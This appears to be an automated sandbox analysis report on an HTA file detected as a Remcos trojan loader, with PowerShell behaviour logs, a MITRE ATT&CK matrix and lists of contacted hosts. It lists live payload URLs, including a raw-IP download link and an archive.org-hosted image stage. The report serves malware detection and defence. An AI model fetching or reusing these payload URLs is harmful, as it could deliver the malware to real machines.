Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	21 Command and Scripting Interpreter	111 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
na.hta	29%	ReversingLabs	Script-WScript.Trojan.Remcos
na.hta	48%	Virustotal		Browse

Source	Detection	Scanner	Link
ia600102.us.archive.org	0%	Virustotal	Browse
15.164.165.52.in-addr.arpa	0%	Virustotal	Browse
50.23.12.20.in-addr.arpa	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ia600102.us.archive.org	207.241.227.242	true	true	0%, Virustotal, Browse	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	false	0%, Virustotal, Browse	unknown
50.23.12.20.in-addr.arpa	unknown	unknown	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.3.220.40/330/verybestthingswesharedfornew.tIF	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://192.3.220.40/330/verybestthingswesharedfornew.tIFn	powershell.exe, 00000003.00000002.2184430637.0000000002877000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2188108754.0000000005756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ia600102.us.archive.org/32/itLR	powershell.exe, 00000007.00000002.3069398891.0000000004E7A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000003.00000002.2189731614.0000000006E30000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000009.00000002.3049506875.0000000005628000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ia600102.us.archive.org	powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg	powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.3049506875.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot	powershell.exe, 00000009.00000002.3049506875.0000000005620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3048457813.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ia600102.2o	powershell.exe, 00000009.00000002.3047716005.0000000003075000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.220.40/330/verybest	powershell.exe, 00000003.00000002.2186146653.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2186146653.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3069398891.0000000004B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3069398891.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3049506875.0000000005101000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2188108754.0000000005756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3057710282.0000000006166000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.220.40/330/verybestthingswesharedfornew.tIFn-	powershell.exe, 00000003.00000002.2184430637.0000000002877000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot	powershell.exe, 00000009.00000002.3048457813.00000000031A8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2186146653.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3069398891.0000000004B76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3049506875.0000000005101000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
